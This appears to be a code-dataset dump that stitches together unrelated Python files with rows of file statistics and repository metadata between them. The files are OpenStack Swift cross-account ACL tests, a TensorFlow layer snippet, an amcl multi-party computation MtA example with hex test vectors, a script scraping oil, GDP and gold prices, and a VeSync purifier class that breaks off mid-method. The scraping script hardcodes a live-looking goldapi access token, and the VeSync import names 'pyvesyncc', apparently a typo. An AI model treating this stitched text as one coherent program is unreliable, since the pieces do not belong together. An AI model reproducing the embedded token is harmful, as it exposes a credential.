        # Now that it is empty, delete the container itself.
        def delete(url, token, parsed, conn):
            conn.request('DELETE', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)

        resp = retry(delete, use_account=self.account)
        resp.read()
        self.assertEqual(resp.status, 204)

    def _assert_cross_account_acl_granted(self, granted, grantee_account, acl):
        '''
        Check whether a given container ACL is granted when a user specified
        by account_b attempts to access a container.
        '''
        # Obtain the first account's string
        first_account = retry(self._get_account, use_account=self.account)

        # Ensure we can't access the container with the grantee account
        def get2(url, token, parsed, conn):
            conn.request('GET', first_account + '/' + self.name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)

        resp = retry(get2, use_account=grantee_account)
        resp.read()
        self.assertEqual(resp.status, 403)

        def put2(url, token, parsed, conn):
            conn.request('PUT', first_account + '/' + self.name + '/object',
                         'test object', {'X-Auth-Token': token})
            return check_response(conn)

        resp = retry(put2, use_account=grantee_account)
        resp.read()
        self.assertEqual(resp.status, 403)

        # Post ACL to the container
        def post(url, token, parsed, conn):
            conn.request('POST', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token,
                          'X-Container-Read': acl,
                          'X-Container-Write': acl})
            return check_response(conn)

        resp = retry(post, use_account=self.account)
        resp.read()
        self.assertEqual(resp.status, 204)

        # Check access to container from grantee account with ACL in place
        resp = retry(get2, use_account=grantee_account)
        resp.read()
        expected = 204 if granted else 403
        self.assertEqual(resp.status, expected)
        resp = retry(put2, use_account=grantee_account)
        resp.read()
        expected = 201 if granted else 403
        self.assertEqual(resp.status, expected)

        # Make the container private again
        def post(url, token, parsed, conn):
            conn.request('POST', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token, 'X-Container-Read': '',
                          'X-Container-Write': ''})
            return check_response(conn)

        resp = retry(post, use_account=self.account)
        resp.read()
        self.assertEqual(resp.status, 204)

        # Ensure we can't access the container with the grantee account again
        resp = retry(get2, use_account=grantee_account)
        resp.read()
        self.assertEqual(resp.status, 403)
        resp = retry(put2, use_account=grantee_account)
        resp.read()
        self.assertEqual(resp.status, 403)
class TestContainerACLsAccount1(BaseTestContainerACLs):
    """Cross-account ACL checks with the container owned by account 1,
    whose project lives in the default domain."""

    def test_cross_account_acl_names_with_user_in_non_default_domain(self):
        # name-based grants are refused when the grantee lives outside the
        # default domain
        acl = tf.swift_test_tenant[3] + ':' + tf.swift_test_user[3]
        self._assert_cross_account_acl_granted(False, 4, acl)

    def test_cross_account_acl_ids_with_user_in_non_default_domain(self):
        # id-based grants still work for a grantee outside the default
        # domain
        tenant_id = retry(self._get_tenant_id, use_account=4)
        self._assert_cross_account_acl_granted(True, 4, tenant_id + ':*')

    def test_cross_account_acl_names_in_default_domain(self):
        # name-based grants work when grantee and project both live in the
        # default domain
        acl = tf.swift_test_tenant[1] + ':' + tf.swift_test_user[1]
        self._assert_cross_account_acl_granted(True, 2, acl)

    def test_cross_account_acl_ids_in_default_domain(self):
        # id-based grants also work within the default domain
        tenant_id = retry(self._get_tenant_id, use_account=2)
        self._assert_cross_account_acl_granted(True, 2, tenant_id + ':*')
class TestContainerACLsAccount4(BaseTestContainerACLs):
    """Same checks, but the container is owned by account 4, whose project
    lives in a non-default domain."""

    account = 4

    def test_cross_account_acl_names_with_project_in_non_default_domain(self):
        # name-based grants are refused when the *project* is outside the
        # default domain
        acl = tf.swift_test_tenant[0] + ':' + tf.swift_test_user[0]
        self._assert_cross_account_acl_granted(False, 1, acl)

    def test_cross_account_acl_ids_with_project_in_non_default_domain(self):
        # id-based grants still work when the project is outside the
        # default domain
        tenant_id = retry(self._get_tenant_id, use_account=1)
        self._assert_cross_account_acl_granted(True, 1, tenant_id + ':*')
if __name__ == '__main__':
    # Allow running this test module directly via the unittest2 runner.
    unittest2.main()
| 37.844235
| 79
| 0.570535
| 8,123
| 68,271
| 4.695802
| 0.050966
| 0.081009
| 0.099622
| 0.101589
| 0.893404
| 0.87521
| 0.861892
| 0.834758
| 0.818661
| 0.803062
| 0
| 0.020284
| 0.302427
| 68,271
| 1,803
| 80
| 37.865225
| 0.780657
| 0.083608
| 0
| 0.853746
| 0
| 0
| 0.08381
| 0.023598
| 0
| 0
| 0
| 0
| 0.188761
| 1
| 0.09438
| false
| 0
| 0.004323
| 0.00072
| 0.167867
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8110d80c610172d8afaa2600b1569488dc59e3b1
| 465
|
py
|
Python
|
Sim_example/tmp/ClassClassMTL_p2.py
|
tsteelejohnson91/Monet
|
9cc6fd5f65ec5024743bb10a0a8086c4e82a7fcd
|
[
"MIT"
] | 2
|
2021-04-16T06:51:23.000Z
|
2021-06-24T18:00:28.000Z
|
Sim_example/tmp/ClassClassMTL_p2.py
|
tsteelejohnson91/Monet
|
9cc6fd5f65ec5024743bb10a0a8086c4e82a7fcd
|
[
"MIT"
] | null | null | null |
Sim_example/tmp/ClassClassMTL_p2.py
|
tsteelejohnson91/Monet
|
9cc6fd5f65ec5024743bb10a0a8086c4e82a7fcd
|
[
"MIT"
] | 2
|
2021-06-25T17:17:27.000Z
|
2022-02-26T09:22:16.000Z
|
# Densely-connected three-layer stack: each layer receives the raw input
# concatenated with all previous layers' outputs (DenseNet-style skip
# connections), so the declared input widths grow by hidden_feats per layer.
# NOTE(review): add_layer, xs, Fsc, hidden_feats, lambda1 and kprob are
# defined elsewhere in the original script; presumably add_layer builds a
# dense layer with sigmoid activation, dropout and L2 penalty -- confirm
# against its definition.
layer1=add_layer(xs,Fsc,hidden_feats,activation_function=tf.sigmoid,dropout_function=True,lambda1=lambda1, keep_prob1=kprob)
# Layer 2 sees [xs, layer1]: input width Fsc + hidden_feats.
layer2=add_layer(tf.concat([xs,layer1],1),Fsc+hidden_feats,hidden_feats,activation_function=tf.sigmoid,dropout_function=True,lambda1=lambda1, keep_prob1=kprob)
# Final layer sees [xs, layer1, layer2]: input width Fsc + 2 * hidden_feats.
layerF=add_layer(tf.concat([xs,layer1,layer2],1),Fsc+hidden_feats+hidden_feats,hidden_feats,activation_function=tf.sigmoid,dropout_function=True,lambda1=lambda1, keep_prob1=kprob)
| 116.25
| 179
| 0.858065
| 72
| 465
| 5.291667
| 0.291667
| 0.173228
| 0.110236
| 0.228346
| 0.902887
| 0.902887
| 0.727034
| 0.727034
| 0.727034
| 0.727034
| 0
| 0.034858
| 0.012903
| 465
| 3
| 180
| 155
| 0.795207
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
812224c965cbc669d405563f1fabb0823cad43c7
| 6,844
|
py
|
Python
|
python/examples/example_mta.py
|
kealan/incubator-milagro-MPC
|
c8e671aec5d3d3c796785e632e9cbb53bfaa53d7
|
[
"Apache-2.0"
] | 6
|
2020-02-18T21:14:57.000Z
|
2022-02-23T15:14:24.000Z
|
python/examples/example_mta.py
|
kealan/incubator-milagro-MPC
|
c8e671aec5d3d3c796785e632e9cbb53bfaa53d7
|
[
"Apache-2.0"
] | 26
|
2020-02-17T11:26:24.000Z
|
2021-01-21T14:06:26.000Z
|
python/examples/example_mta.py
|
kealan/incubator-milagro-MPC
|
c8e671aec5d3d3c796785e632e9cbb53bfaa53d7
|
[
"Apache-2.0"
] | 4
|
2020-02-27T16:12:37.000Z
|
2022-03-15T11:52:29.000Z
|
#!/usr/bin/env python3
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
import os
import sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import amcl.core_utils
import amcl.mpc
seed_hex = "78d0fb6705ce77dee47d03eb5b9c5d30"
P_hex = "94f689d07ba20cf7c7ca7ccbed22ae6b40c426db74eaee4ce0ced2b6f52a5e136663f5f1ef379cdbb0c4fdd6e4074d6cff21082d4803d43d89e42fd8dfa82b135aa31a8844ffea25f255f956cbc1b9d8631d01baf1010d028a190b94ce40f3b72897e8196df19edf1ff62e6556f2701d52cef1442e3301db7608ecbdcca703db"
Q_hex = "9a9ad73f246df853e129c589925fdad9df05606a61081e62e72be4fb33f6e5ec492cc734f28bfb71fbe2ba9a11e4c02e2c0d103a5cbb0a9d6402c07de63b1b995dd72ac8f29825d66923a088b421fb4d52b0b855d2f5dde2be9b0ca0cee6f7a94e5566735fe6cff1fcad3199602f88528d19aa8d0263adff8f5053c38254a2a3"
a_hex = "0000000000000000000000000000000000000000000000000000000000000002"
b_hex = "0000000000000000000000000000000000000000000000000000000000000003"
ca_hex = "19c8b725dbd74b7dcaf72bd9ff2cd207b47cb1095393685906171af9e2f2959e7f68729e0e40f97a22bbca93373d618ad51dd077c0d102938598a8ecc8a656e978ebd14007da99db8e691d85fc18a428097ee8a63dcf95b84b660294474a20ed2edcf2b1b4f305c1cc25860a08d1348c2a4d24cc1a97b51f920e2985b8108b3392a5eafc443cf3449e288eb49dbde2228a56233afa5a6643e5ae6ec6aa8937a666ef74a30625c35bb22c3cc57b700f8eae7690f8d37edbfd27ccb2e882f70d0d85e0cc825347453a28e98e877ab1eeaa6efa09f034bc8976bffb86420106978066ff52221b315f71eb32cbf608d2b72cfa4c88e43282598f175b48ba3b5c14d72b2d90baabc00025450740ac89fc0dcd7d2f80cf12c721b6ec493c2025d7adc683b78f1d711b639a1b0dd043b9defa7ff928e257599dd95525bc8b45e1b88470311e11feb72749e5fc98f69051ddd1101b1bcc92f649681bd7ae316575444625d9d73d3684789142650951321e17f6b2f92103f36dbbd004cd66cda366e80faa4f57b71b9abb042f6cc932716fa3e6fdf50674e3d1e6d871f723d3f4f672c1270b41e7cdd5930a2572ddfc8ce370576a7a75ee6924f53122d717146c74eb6167811a2488bb899cc2da9dc2e29df66b5a03ed986fdad6ef177151ddd2698055050709c475b4ed5a2ab0be00c8b03e24193fb79f91cfd81fbcb838e45c25f8ba05"
R_hex = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000018c5947fda2edea04c1f87c207e0bab17aff5f77ac21d04cb194631efd1f7256dc37de9473fc86009df36206974859c09023ac8179b02aacea8d89a01f4de161db955d450cef55ce959897636973b952371e349778e67c61ef6fae5f73fd728d423a594b6a76d5faca97d59d6ae40c53f3bd42dfccc93183e355422ba7af308a87d32c0352d478156275f98bc74e9ed4f2c7a9853c9f35b996fafe765b56c7f2e83771c6b676b75436e5c1697b838b3908aee92001cbccf3bf6cfb7aaea27a358a12cfe1ddde886b975ae14517e5912eba3ff9792e46403a998edd371020bbc5fbd6a705e669383303030ef79653ce16e13122233c626bb101ee8dd27bf4ff86"
cb_hex = "1f1f087e749c85aacdacaace8659a33b53baad5eec1e56628435d335a8b150f96865d6e090f53146e120e7089b6f4a91c762622b24d0d2fba0e703301170a0b826a1336d4d6bb83dccd29ad9ef0936614bf14e992ea4daa202c63ace9bd3f95b9a8a6edd7949e89ec165541e7c01bd41395baf3e2fe7f3a9611af8b5ed8639c02a2bfc236c17a136bef6d09f966db718f3df9d6f4f40b618b4b6058b4e4ec241e6c2424404d0aee0ef5cd666e5c4253a62ae9deb09289fb84657109e0b933f58871ba7ea77190d6ea45a04be68360478adf43a85851cf583c5575543578635996d2dcd020aeceabf18be6ff8b45e4ecd63c899cbfe353bc6be246aa421f54bb1f6aad797b36e435e2f33a3a049aeab894b851c5ce1076aa6e19316e3da6f539197e00e17e7a3025b53490a9d1210b900c1cac32a3bdc31d4c4866e7499a2858942e057be2840cf8ad4b1dcd914c64ac7d4b89e3f1b1a010096ecb62bb5837d9e79018870002962838bc46d7a70c23494985c300b4f8a7352a412bfc4134378d23343b3c8a77f65c234c8586e5fb0731881cb756e994c82773261f2a2321e45df45a08830e67b6c983e3f01a464b9ca6cc78ec7f170782748d114889656377e86a1e3b3c28616f3b4b73693867fefd7459fe99e9892435f0902ad74ceebac99c4f67340344f128b1f55fdb85acdc64891b77d9961653361f5264d5f1e0b67173b"
z_hex = "0000000000000000000000000000000000000000000000000000000000000004"
beta_hex = "fffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd036413d"
alpha_hex = "000000000000000000000000000000000000000000000000000000000000000a"
if __name__ == "__main__":
seed = bytes.fromhex(seed_hex)
p = bytes.fromhex(P_hex)
q = bytes.fromhex(Q_hex)
a = bytes.fromhex(a_hex)
b = bytes.fromhex(b_hex)
z = bytes.fromhex(z_hex)
r = bytes.fromhex(R_hex)
ai = int(a_hex, 16)
bi = int(b_hex, 16)
expected = ai * bi % amcl.mpc.curve_order
print(f"expected {hex(expected)}")
# random number generator
rng = amcl.core_utils.create_csprng(seed)
# Deterministic
paillier_pk, paillier_sk = amcl.mpc.paillier_key_pair(None, p, q)
ca = amcl.mpc.mpc_mta_client1(rng, paillier_pk, a, r)
ca1_hex = ca.hex()
assert ca_hex == ca1_hex, f"expected {ca_hex} got {ca1_hex}"
cb, beta = amcl.mpc.mpc_mta_server(rng, paillier_pk, b, ca, z, r)
cb1_hex = cb.hex()
assert cb_hex == cb1_hex, f"expected {cb_hex} got {cb1_hex}"
alpha = amcl.mpc.mpc_mta_client2(paillier_sk, cb)
print(f"alpha {alpha.hex()}")
print(f"beta {beta.hex()}")
alphai = int(alpha.hex(), 16)
betai = int(beta.hex(), 16)
got = ( alphai + betai ) % amcl.mpc.curve_order
print(f"got {hex(got)}")
assert got == expected, f"expected {hex(expected)} got {hex(got)}"
# Random
paillier_pk, paillier_sk = amcl.mpc.paillier_key_pair(rng)
ca = amcl.mpc.mpc_mta_client1(rng, paillier_pk, a)
cb, beta = amcl.mpc.mpc_mta_server(rng, paillier_pk, b, ca)
alpha = amcl.mpc.mpc_mta_client2(paillier_sk, cb)
print(f"alpha {alpha.hex()}")
print(f"beta {beta.hex()}")
alphai = int(alpha.hex(), 16)
betai = int(beta.hex(), 16)
got = ( alphai + betai ) % amcl.mpc.curve_order
print(f"got {hex(got)}")
assert got == expected, f"expected {hex(expected)} got {hex(got)}"
# Clear memory
amcl.core_utils.kill_csprng(rng)
amcl.mpc.paillier_private_key_kill(paillier_sk)
| 63.962617
| 1,035
| 0.863676
| 473
| 6,844
| 12.327696
| 0.319239
| 0.015606
| 0.01029
| 0.013377
| 0.113703
| 0.113703
| 0.109758
| 0.109758
| 0.109758
| 0.095352
| 0
| 0.437072
| 0.081677
| 6,844
| 106
| 1,036
| 64.566038
| 0.490692
| 0.122151
| 0
| 0.280702
| 0
| 0
| 0.702135
| 0.656438
| 0
| 1
| 0
| 0
| 0.070175
| 1
| 0
| false
| 0
| 0.070175
| 0
| 0.070175
| 0.122807
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d49be53417572d6f95078831afa4b93667958f50
| 14,247
|
py
|
Python
|
script.py
|
utopiatao/GDP-Oilprices-analysis
|
f49372fc6cc10e42c5154cdaba8277d7b8357ea2
|
[
"Apache-2.0"
] | null | null | null |
script.py
|
utopiatao/GDP-Oilprices-analysis
|
f49372fc6cc10e42c5154cdaba8277d7b8357ea2
|
[
"Apache-2.0"
] | null | null | null |
script.py
|
utopiatao/GDP-Oilprices-analysis
|
f49372fc6cc10e42c5154cdaba8277d7b8357ea2
|
[
"Apache-2.0"
] | null | null | null |
import csv, sys
import webbrowser as wbb
import sqlite3
import datetime
from bs4 import BeautifulSoup
import requests
import webbrowser as wbb
import urllib.request, urllib.parse, urllib.error
import xlrd
import pandas as pd
import http.client
from sqlalchemy import create_engine
def _show_table(table_name, title, trailing_rule=True):
    """Print *title* and the head of a table stored in TaoProject.db."""
    conn = create_engine('sqlite:///TaoProject.db').connect()
    data_sql = pd.read_sql_table(table_name, conn)
    print(title)
    print(data_sql.head())
    if trailing_rule:
        print('=' * 50)


def _oil_xls_link():
    """Scrape the EIA page for the historical crude-oil-price workbook.

    Returns (filename, url) of the last ``.xls`` link found on the page.
    """
    content = requests.get('https://www.eia.gov/dnav/pet/hist/LeafHandler.ashx?n=pet&s=f005006__3&f=m')
    soup = BeautifulSoup(content.content, 'html.parser')
    link = ""
    for tag in soup('a'):
        href = str(tag.get('href', None))
        if ".xls" in href:
            link = href
    filename = link[link.find("xls/") + 4:]
    url = "https://www.eia.gov/dnav/pet" + link[link.find("/hist"):]
    return filename, url


def _scrape_oil_prices():
    """Read monthly crude oil prices from the downloaded EIA workbook.

    Returns (oilprices, the_months, oil_price_dictionary) for months after
    September 2019 (Excel serial date 43722).
    """
    has_csv = input('Did you manually download \'F005006__3m.csv\'?[y/n]')
    if has_csv == 'n':
        # Open the workbook URL in the browser so it gets downloaded.
        _, url = _oil_xls_link()
        wbb.open(url)
    filename, _ = _oil_xls_link()
    data = xlrd.open_workbook(filename)
    table = data.sheet_by_name(u'Data 1')
    rows = [line for line in table]
    del rows[0:3]  # drop header rows
    oilprices = []
    for row in rows:
        # Cell reprs look like 'xldate:43722.0' / 'number:56.95' --
        # strip the 7-char prefix before converting.
        date = float(str(row[0])[7:])
        price = float(str(row[1])[7:])
        if date > 43722:  # keep months after Sep-2019 only
            oilprices.append(price)
    oil_price_dictionary = {}
    the_months = []
    month_year = "09-01-2019"  # MM-DD-YYYY, advanced one month per price
    for price in oilprices:
        parts = month_year.split('-')
        month, day, year = int(parts[0]), int(parts[1]), int(parts[2])
        stamp = datetime.date(year, month, day)
        the_months.append(stamp)
        oil_price_dictionary[stamp] = price
        if month != 12:
            month += 1
        else:
            year += 1
            month = 1
        month_year = str(month) + '-' + str(day) + '-' + str(year)
    return oilprices, the_months, oil_price_dictionary


def _scrape_gdp():
    """Scrape quarterly US GDP levels from FRED release tables.

    Returns a dict keyed by quarter label ('Q3,2019', ...) mapping to the
    GDP level of that quarter.
    """
    urlpages = ["https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2019-07-01#",
                'https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2019-10-01#',
                "https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2020-01-01#",
                "https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2020-04-01#",
                "https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2020-07-01#",
                "https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2020-10-01#",
                "https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2021-01-01#",
                "https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2021-04-01#",
                "https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=#"]
    quarterly_GDP = []
    for url in urlpages:
        page = urllib.request.urlopen(url)
        soup = BeautifulSoup(page, 'html.parser')
        cell = soup.find('td', attrs={'class': 'fred-rls-elm-vl-td'})
        value = float(cell.get_text().strip().replace(',', ""))
        quarterly_GDP.append(value)
    # NOTE(review): the original also computed a GDP_growth list here that
    # was never used anywhere; it has been dropped.
    GDP_growth_dictionary = {}
    quater = 'Q3,2019'
    for value in quarterly_GDP:
        GDP_growth_dictionary[quater] = value
        if quater[1] != '4':
            # Bump the quarter digit; its first occurrence is at index 1,
            # so replace(..., 1) only touches the quarter, not the year.
            quater = quater.replace(quater[1], str(int(quater[1]) + 1), 1)
        else:
            # Q4 rolls over to Q1 of the next year.
            quater = 'Q1,' + str(int(quater[3:7]) + 1)
    return GDP_growth_dictionary


def _scrape_gold(oilprices, the_months):
    """Fetch one gold price per oil-price month from goldapi.io.

    Returns a dict mapping each date in *the_months* to a gold price.
    """
    conn = http.client.HTTPSConnection("www.goldapi.io")
    headers = {
        'x-access-token': 'goldapi-4490ztkwbniq43-io',
        'Content-Type': 'application/json'
    }
    goldprices = []
    first_month = '20190925'  # YYYYMMDD, advanced one month per request
    for _ in oilprices:
        conn.request("GET", "/api/XAU/USD/" + first_month, '', headers)
        raw = conn.getresponse().read().decode('utf-8')
        idx = raw.find("price\":")
        # Take the four characters after 'price":' as the quoted price.
        goldprices.append(float(raw[idx + 7:idx + 11]))
        if first_month[4:6] == '12':
            # December -> January of the next year: +8900 turns
            # YYYY1225 into (YYYY+1)0125.
            first_month = str(int(first_month) + 8900)
        else:
            first_month = str(int(first_month) + 100)
    return {the_months[i]: goldprices[i] for i in range(len(the_months))}


def _print_items(mapping, limit=None):
    """Print the (key, value) pairs of *mapping*, optionally only the first *limit*."""
    items = list(mapping.items())
    if limit is not None:
        items = items[:limit]
    for item in items:
        print(item)


def _scrape_and_report(limit=None):
    """Scrape oil, GDP and gold data and print each (first *limit* rows)."""
    oilprices, the_months, oil_price_dictionary = _scrape_oil_prices()
    print('historical oil prices:')
    _print_items(oil_price_dictionary, limit)
    print('=' * 50)
    print('The GDP of the US:')
    _print_items(_scrape_gdp(), limit)
    print('=' * 50)
    print('Historical Gold Prices:')
    _print_items(_scrape_gold(oilprices, the_months), limit)


try:
    your_command = sys.argv[1]
    if your_command == '--static':
        # Show the previously stored tables, then run the analysis module.
        _show_table('historical_quaterly_GDP', 'The GDP of the US:')
        _show_table('historical_crude_oil_price', 'Historical crude oil prices:')
        _show_table('historical_gold_price', 'Historical gold prices:',
                    trailing_rule=False)
        import analysis
    elif your_command == '--scrape':
        # Scrape fresh data and show only the first five rows of each set.
        _scrape_and_report(limit=5)
    else:
        print('Please enter \'filename\' (space) \'--static\' or \'--scrape\'')
except Exception:
    # Fallback path: missing/invalid CLI argument or any failure above --
    # scrape fresh data (printing everything) and run the analysis module.
    # NOTE(review): the original used a bare ``except:``; narrowed to
    # ``Exception`` so KeyboardInterrupt / SystemExit are no longer swallowed.
    _scrape_and_report()
    import analysis
| 39.032877
| 112
| 0.539131
| 1,740
| 14,247
| 4.297126
| 0.12931
| 0.013909
| 0.020864
| 0.052962
| 0.916009
| 0.899826
| 0.889127
| 0.873345
| 0.873345
| 0.873345
| 0
| 0.063053
| 0.325402
| 14,247
| 365
| 113
| 39.032877
| 0.71491
| 0.033761
| 0
| 0.868263
| 0
| 0.04491
| 0.198609
| 0.014138
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.041916
| 0
| 0.041916
| 0.07485
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d49fc4c4a1cefd1582dd29d1552e145904ebd28d
| 48,800
|
py
|
Python
|
src/pyvesync/vesyncfan.py
|
ryufon/pyvesync
|
22cc36518215decbf75b1e044007794d8427f9cd
|
[
"MIT"
] | null | null | null |
src/pyvesync/vesyncfan.py
|
ryufon/pyvesync
|
22cc36518215decbf75b1e044007794d8427f9cd
|
[
"MIT"
] | null | null | null |
src/pyvesync/vesyncfan.py
|
ryufon/pyvesync
|
22cc36518215decbf75b1e044007794d8427f9cd
|
[
"MIT"
] | null | null | null |
"""VeSync API for controling fans and purifiers."""
import json
import logging
from typing import Dict, Tuple, Union
from pyvesyncc.vesyncbasedevice import VeSyncBaseDevice
from pyvesyncc.helpers import Helpers
air_features = {
'Dual200S': [],
'Classic200S': ['nightlight']
}
logger = logging.getLogger(__name__)
class VeSyncAir200S(VeSyncBaseDevice):
    """Core200S Purifier Class."""

    def __init__(self, details, manager):
        """Initialize Core200S Purifier class."""
        super().__init__(details, manager)
        self.enabled = True
        # Last-known device state, refreshed by get_details()/update().
        self.details: Dict[str, Union[str, int, float, bool]] = {
            'filter_life': 0,
            'mode': "manual",
            'level': 0,
            'display': False,
            'child_lock': False,
            'night_light': "off"
        }
        # Display configuration reported by the device.
        self.config: Dict[str, Union[str, int, float, bool]] = {
            'display': False,
            'display_forever': False
        }

    def __build_api_dict(self, method: str) -> Tuple[Dict, Dict]:
        """Build Core200S api call header and body.

        Available methods are: 'getPurifierStatus', 'setSwitch',
        'setNightLight', 'setLevel', 'setDisplay'
        'setPurifierMode', 'setChildLock'

        Returns ``({}, {})`` for an unknown method.
        """
        modes = ['getPurifierStatus', 'setSwitch', 'setNightLight',
                 'setLevel', 'setPurifierMode', 'setDisplay',
                 'setChildLock']
        if method not in modes:
            logger.debug('Invalid mode - %s', method)
            return {}, {}
        head = Helpers.bypass_header()
        body = Helpers.bypass_body_v2(self.manager)
        body['cid'] = self.cid
        body['configModule'] = self.config_module
        body['payload'] = {
            'method': method,
            'source': 'APP'
        }
        return head, body

    def build_purifier_dict(self, dev_dict: Dict):
        """Build Core200S purifier status dictionary from an API payload."""
        self.enabled = dev_dict.get('enabled')
        if self.enabled:
            self.device_status = 'on'
        else:
            self.device_status = 'off'
        self.details['filter_life'] = dev_dict.get('filter_life', 0)
        self.mode = dev_dict.get('mode', 'manual')
        self.speed = dev_dict.get('level', 0)
        # NOTE(review): the original assigned details['display'] twice;
        # the duplicate assignment has been removed.
        self.details['display'] = dev_dict.get('display', False)
        self.details['child_lock'] = dev_dict.get('child_lock', False)
        self.details['night_light'] = dev_dict.get('night_light', 'off')
        self.details['display_forever'] = dev_dict.get('display_forever',
                                                       False)

    def build_config_dict(self, conf_dict):
        """Build configuration dict for Core200S purifier."""
        self.config['display'] = conf_dict.get('display', False)
        self.config['display_forever'] = conf_dict.get('display_forever',
                                                       False)

    def get_details(self) -> None:
        """Fetch current purifier status and populate details/config."""
        head = Helpers.bypass_header()
        body = Helpers.bypass_body_v2(self.manager)
        body['cid'] = self.cid
        body['configModule'] = self.config_module
        body['payload'] = {
            'method': 'getPurifierStatus',
            'source': 'APP',
            'data': {}
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        outer_result = r.get('result', {})
        inner_result = None
        if outer_result:
            inner_result = r.get('result', {}).get('result')
        if inner_result is not None and Helpers.code_check(r):
            if outer_result.get('code') == 0:
                self.build_purifier_dict(inner_result)
            else:
                logger.debug('error in inner result dict from purifier')
            if inner_result.get('configuration', {}):
                self.build_config_dict(inner_result.get('configuration', {}))
            else:
                logger.debug('No configuration found in purifier status')
        else:
            logger.debug('Error in purifier response')

    def update(self):
        """Update Core200S Purifier details."""
        self.get_details()

    @property
    def fan_level(self) -> int:
        """Get current fan level (1-3)."""
        return int(self.speed)

    @property
    def filter_life(self) -> int:
        """Get percentage of filter life remaining."""
        try:
            return int(self.details['filter_life'])
        except KeyError:
            return 0

    @property
    def display_state(self) -> bool:
        """Get display state."""
        return bool(self.details['display'])

    @property
    def child_lock(self) -> bool:
        """Get child lock state."""
        return bool(self.details['child_lock'])

    @property
    def night_light(self) -> str:
        """Get night light state (on/dim/off)."""
        return str(self.details['night_light'])

    def toggle_switch(self, toggle: bool) -> bool:
        """Toggle purifier on/off; returns True on API success."""
        if not isinstance(toggle, bool):
            logger.debug('Invalid toggle value for purifier switch')
            return False
        head = Helpers.bypass_header()
        body = Helpers.bypass_body_v2(self.manager)
        body['cid'] = self.cid
        body['configModule'] = self.config_module
        body['payload'] = {
            'data': {
                'enabled': toggle,
                'id': 0
            },
            'method': 'setSwitch',
            'source': 'APP'
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if Helpers.code_check(r):
            return True
        logger.debug("Error toggling Core200S purifier - %s",
                     self.device_name)
        return False

    def turn_on(self) -> bool:
        """Turn Core200S Purifier on."""
        return self.toggle_switch(True)

    def turn_off(self):
        """Turn Core200S Purifier off."""
        return self.toggle_switch(False)

    def child_lock_on(self) -> bool:
        """Turn Core200S child lock on."""
        return self.set_child_lock(True)

    def child_lock_off(self) -> bool:
        """Turn Core200S child lock off."""
        return self.set_child_lock(False)

    def set_child_lock(self, mode: bool) -> bool:
        """Set Core200S child lock; returns True on API success."""
        if mode not in (True, False):
            logger.debug('Invalid mode passed to set_child_lock - %s', mode)
            return False
        head, body = self.__build_api_dict('setChildLock')
        if not head and not body:
            return False
        body['payload']['data'] = {
            'child_lock': mode
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if r is not None and Helpers.code_check(r):
            self.details['child_lock'] = mode
            return True
        if isinstance(r, dict):
            logger.debug('Error toggling child lock')
        else:
            logger.debug('Error in api return json for %s', self.device_name)
        return False

    def set_display(self, mode: bool) -> bool:
